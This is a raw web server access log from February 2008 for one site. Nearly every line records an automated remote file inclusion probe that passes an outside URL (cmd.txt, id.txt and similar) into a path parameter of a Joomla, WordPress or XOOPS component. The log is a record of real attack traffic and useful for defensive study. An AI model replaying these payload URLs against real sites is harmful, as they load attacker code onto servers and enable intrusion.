216.138.195.10 - - [24/Feb/2008:06:24:32 -0800] "GET /logs/access_071126.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
209.216.205.192 - - [24/Feb/2008:06:26:59 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:06:27:13 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.36.135.90 - - [24/Feb/2008:06:27:30 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:28:00 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.64.152 - - [24/Feb/2008:06:28:50 -0800] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.64.152 - - [24/Feb/2008:06:28:50 -0800] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.64.152 - - [24/Feb/2008:06:28:50 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:06:29:06 -0800] "GET /logs/access_080211.log//photoalb/lib/static/header.php?set_menu=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:06:29:07 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:06:29:08 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:06:29:42 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:30:31 -0800] "GET /logs/access_071217.log//redaxo/include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
90.185.233.233 - - [24/Feb/2008:06:31:29 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
90.185.233.233 - - [24/Feb/2008:06:31:29 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
90.185.233.233 - - [24/Feb/2008:06:31:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:06:32:37 -0800] "GET /logs/access_071126.log//appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:06:32:37 -0800] "GET //appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:06:32:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:06:32:38 -0800] "GET /logs/access_080127.log//appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:06:33:04 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.17.29.41 - - [24/Feb/2008:06:33:46 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
217.17.29.41 - - [24/Feb/2008:06:33:47 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
67.195.58.180 - - [24/Feb/2008:06:34:27 -0800] "GET /logs/access_080114.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
222.239.78.91 - - [24/Feb/2008:06:35:38 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [24/Feb/2008:06:35:39 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [24/Feb/2008:06:35:39 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
90.185.233.233 - - [24/Feb/2008:06:35:57 -0800] "GET /logs/access_080127.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.121.22.134 - - [24/Feb/2008:06:38:02 -0800] "GET //appserv/main.php?appserv_root=http://www.australiada.net/userpics/zwierzeta_motyle/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:38:05 -0800] "GET /logs/access_071231.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:39:07 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:39:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:39:08 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.255.3.68 - - [24/Feb/2008:06:39:10 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:39:11 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:39:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:39:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:39:17 -0800] "GET /logs/access_071231.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:39:55 -0800] "GET /logs/access_071231.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:40:42 -0800] "GET /logs/access_080127.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:41:18 -0800] "GET /logs/access_080127.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
150.164.211.202 - - [24/Feb/2008:06:41:58 -0800] "GET //index.php?body=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.101.240.7 - - [24/Feb/2008:06:42:00 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
87.101.240.9 - - [24/Feb/2008:06:42:00 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:42:12 -0800] "GET /?mosConfig_absolute_path=http://yugifire.t35.com/mic22.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.56.111.194 - - [24/Feb/2008:06:42:14 -0800] "GET /logs/access_071231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [24/Feb/2008:06:42:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [24/Feb/2008:06:42:14 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.138.195.10 - - [24/Feb/2008:06:42:17 -0800] "GET /logs/access_080127.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
209.216.205.192 - - [24/Feb/2008:06:42:21 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.216.205.192 - - [24/Feb/2008:06:42:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.7.68 - - [24/Feb/2008:06:42:51 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
211.233.7.68 - - [24/Feb/2008:06:42:55 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:06:43:15 -0800] "GET /logs/access_071203.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:06:43:15 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.239.78.91 - - [24/Feb/2008:06:43:51 -0800] "GET /logs/access_080114.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.36.135.90 - - [24/Feb/2008:06:43:58 -0800] "GET /logs/access_071126.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.36.135.90 - - [24/Feb/2008:06:43:58 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.66.202 - - [24/Feb/2008:06:44:02 -0800] "GET /logs/access_080127.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.36.135.90 - - [24/Feb/2008:06:44:09 -0800] "GET /logs/access_080114.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:45:18 -0800] "GET /logs/access_080114.log/?mosConfig_absolute_path=http://yugifire.t35.com/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:45:19 -0800] "GET /?mosConfig_absolute_path=http://yugifire.t35.com/mic22.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:45:20 -0800] "GET /logs/?mosConfig_absolute_path=http://yugifire.t35.com/mic22.txt?? HTTP/1.1" 200 3798 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.241.183.41 - - [24/Feb/2008:06:46:22 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
212.241.183.41 - - [24/Feb/2008:06:46:23 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
89.108.64.152 - - [24/Feb/2008:06:46:26 -0800] "GET /logs/access_080107.log/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.216.205.192 - - [24/Feb/2008:06:46:33 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:46:40 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:46:41 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:06:46:41 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:47:05 -0800] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:47:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:47:06 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
61.250.95.201 - - [24/Feb/2008:06:48:07 -0800] "GET /logs/access_071126.log/?mosConfig_absolute_path=http://yugifire.t35.com/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.109.245.113 - - [24/Feb/2008:06:49:28 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.109.245.113 - - [24/Feb/2008:06:49:29 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.109.245.113 - - [24/Feb/2008:06:49:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:06:49:54 -0800] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:06:49:57 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [24/Feb/2008:06:50:04 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
194.79.75.195 - - [24/Feb/2008:06:51:50 -0800] "GET /index.php?option=com_joomlaxplorer_OLD&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.212.164.34 - - [24/Feb/2008:06:52:26 -0800] "GET /logs/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.212.164.34 - - [24/Feb/2008:06:52:26 -0800] "GET /plugins/payment/verotel/verotel.inc.php?config[Broot_dir]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
194.79.75.195 - - [24/Feb/2008:06:52:39 -0800] "GET /logs/access_080114.log/index.php?option=com_joomlaxplorer_OLD&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
194.79.75.195 - - [24/Feb/2008:06:52:39 -0800] "GET /logs/index.php?option=com_joomlaxplorer_OLD&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.220.64.3 - - [24/Feb/2008:06:52:58 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
206.220.64.3 - - [24/Feb/2008:06:52:58 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
206.220.64.3 - - [24/Feb/2008:06:52:58 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:06:55:37 -0800] "GET /logs/access_071126.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:06:55:37 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:06:55:51 -0800] "GET /logs/access_080114.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:08 -0800] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:08 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.168.15.147 - - [24/Feb/2008:06:56:08 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
